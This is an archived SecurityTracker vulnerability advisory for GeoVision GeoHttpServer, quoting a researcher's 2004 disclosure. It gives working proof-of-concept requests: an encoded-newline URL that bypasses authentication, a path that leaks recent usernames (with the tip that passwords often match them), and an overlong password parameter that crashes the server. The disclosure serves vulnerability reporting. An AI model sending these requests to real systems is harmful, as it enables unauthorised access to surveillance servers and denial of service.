SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Multimedia)  >   GeoHttpServer Vendors:   GeoVision Inc.
GeoVision GeoHttpServer Authentication Bypass Grants Access to Remote Users
SecurityTracker Alert ID:  1008826
SecurityTracker URL:  http://securitytracker.com/id/1008826
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Jan 22 2004
Original Entry Date:  Jan 22 2004
Impact:   User access via network


Description:   Rafel Ivgi (The-Insider) reported a vulnerability in the GeoVision GeoHttpServer. A remote user can bypass the authentication mechanism and access the main page on the application.

It is reported that a remote user can supply the following URL to gain access to the main page without having to authenticate:

http://[target]/%0a%0a

A remote user can then retrieve a list of recently used usernames at the following URL:

http://[target]/logfile.txt

Impact:   A remote user can gain access on the application.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.geovision.com.tw (Links to External Site)
Cause:   Authentication error
Underlying OS:   Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Thu, 22 Jan 2004 19:23:16 +0200
Subject:  GeoHttpServer Authentification Bypass Vulnerability & D.O.S (Denial Of Service)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software:       GeoHttpServer
Vendor:          GEOVISION INC
                        http://www.geovision.com.tw
Versions:        ALL
Platforms:       Unix
Bug:                 Authentification Bypass Vulnerability & D.O.S (Denial
Of Service)
Risk:                High
Exploitation:   Remote with browser
Date:               22 Jan 2004
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider@mail.com
web:                http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

thttpd is a free "Open Source" webserver that comes by default with unix
systems such as
FREEBSD and Linux.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The GeoHttpServer Security is pretty good. Some users, who understand what
they are doing configure the server to authentificate login attempts.

The server uses this authentification code:
**********************************************
<html><head><title>Login In</title>
</head><body><center>
<form method="POST" action="phoneinfo">User Name:</BR>
  <input type="id" name="id" size="10"><p></p>
  Password:</BR>
  <input type="password" name="pwd" size="10">
  <p><input type="radio" name="ImageType" value="1" checked>JPEG&nbsp;
  <input type="radio" name="ImageType" value="2">GIF</p>
  <p><input type="submit" name="send" value="Submit"><input type="reset"
name="CANCEL" value="Cancel"></center><center><br>
  </p>
</form>
</center>
</body>
</html>
**********************************************

Amazingly - http://<host>/%0a%0a Bypasses it!
You get the GeoHttpServer default Main Page.

Now the main page leads to functions that also require authentifiaction,
In order to retrieve a user name we can go to http://<host>/logfile.txt
Which generally contains the last logins and usernames.
In most cases the password will be the same as the user.

In addition there is an authentification form inside the server that
requires a name and
a password in order to see the server info/config.
Manipulating this links can cause Denial Of service of the server.

P.O.C(Proof Of Concept):
http://<GeoHttpServerhost>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa

Another D.O.S caused by the server is an Internet Explorer D.O.S when
someone is watching
video stream from the server and presses the reconnect button, I.E has an
overflow.
Internet Explorer Version: 6.0.2600.0
Module Stuck: msxml3.dll
Module Version: 8.20.9415.0
Offset: 00013ed6

http://theinsider.deep-ice.com/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Authentification Bypass - http://<host>/%0a%0a Bypasses it!
Denial Of Service -
http://<GeoHttpServerhost>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC